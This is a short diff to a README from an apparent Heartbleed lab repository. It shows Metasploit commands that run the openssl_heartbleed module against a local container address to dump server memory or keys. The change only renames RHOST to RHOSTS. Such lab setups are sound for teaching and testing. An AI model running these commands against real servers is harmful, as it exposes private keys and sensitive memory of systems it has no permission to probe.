Vince300/cysec-heartbleed/README.md

 ./msfconsole
 use auxiliary/scanner/ssl/openssl_heartbleed
 set ACTION DUMP      # Just dump data.
-Use KEYS if you want to try dumping the keys set RHOST 172.17.0.2 # IP address from the network inspect command set RPORT 443        # Change if you use a different port in the container run
+Use KEYS if you want to try dumping the keys set RHOSTS 172.17.0.2 # IP address from the network inspect command set RPORT 443        # Change if you use a different port in the container run
 ```